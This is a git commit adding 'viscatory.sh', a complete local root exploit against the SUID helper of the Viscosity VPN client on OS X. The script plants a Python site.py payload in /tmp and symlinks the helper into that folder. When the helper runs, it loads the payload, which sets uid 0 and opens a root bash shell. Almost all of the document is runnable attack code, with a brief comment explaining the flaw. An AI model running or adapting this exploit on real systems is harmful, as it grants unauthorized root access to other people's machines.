Initial commit of easy local root.

1 files changed, 32 insertions, 0 deletions

diff --git a/viscatory.sh b/viscatory.sh
new file mode 100755
index 0000000..4f323b3
--- /dev/null
+++ b/viscatory.sh
@@ -0,0 +1,32 @@
+#!/bin/sh
+#
+##########################
+#       Viscatory        #
+#                        #
+#         zx2c4          #
+##########################
+#
+# After the hullabaloo from the Tunnelblick local root, savy Mac users
+# began defending Viscosity, another OS X VPN client. They figured, since
+# they spent money on Viscosity, surely it would be better designed than
+# the free alternative.
+#
+# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
+# the win. Here, the SUID helper will execute site.py in its enclosing
+# folder. A simple symlink, and we have root.
+
+echo "[+] Crafting payload."
+mkdir -p -v /tmp/pwn
+cat > /tmp/pwn/site.py <<_EOF
+import os
+print "[+] Cleaning up."
+os.system("rm -rvf /tmp/pwn")
+print "[+] Getting root."
+os.setuid(0)
+os.setgid(0)
+os.execl("/bin/bash", "bash")
+_EOF
+echo "[+] Making symlink."
+ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
+echo "[+] Running vulnerable SUID helper."
+exec /tmp/pwn/root